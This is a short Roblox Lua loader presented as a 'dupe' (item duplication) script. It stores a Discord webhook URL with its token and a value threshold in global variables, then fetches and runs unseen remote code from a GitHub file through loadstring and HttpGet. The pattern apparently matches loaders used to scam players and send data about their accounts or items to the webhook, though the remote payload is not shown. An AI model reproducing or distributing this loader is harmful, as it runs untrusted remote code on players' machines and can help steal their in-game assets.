local Webhook = "https://discord.com/api/webhooks/1445153064917930166/qbTnzHqBeL9khPofY89iRr6Ngl-3rqwCU4TqXb6mgL0G1Xqlt8-c1xZ7kAGFjUvC9dOr"

getgenv().UserPingThreshold = 50000000


-- =================================================================================
--      SCRIPT LOADER - DO NOT EDIT BELOW THIS LINE
-- =================================================================================

if Webhook and Webhook:match("discord.com/api/webhooks") then
    getgenv().UserWebhookURL = Webhook
else
    return
end

loadstring(game:HttpGet('https://raw.githubusercontent.com/LXZRz/dupe/main/dupe.lua', true))()
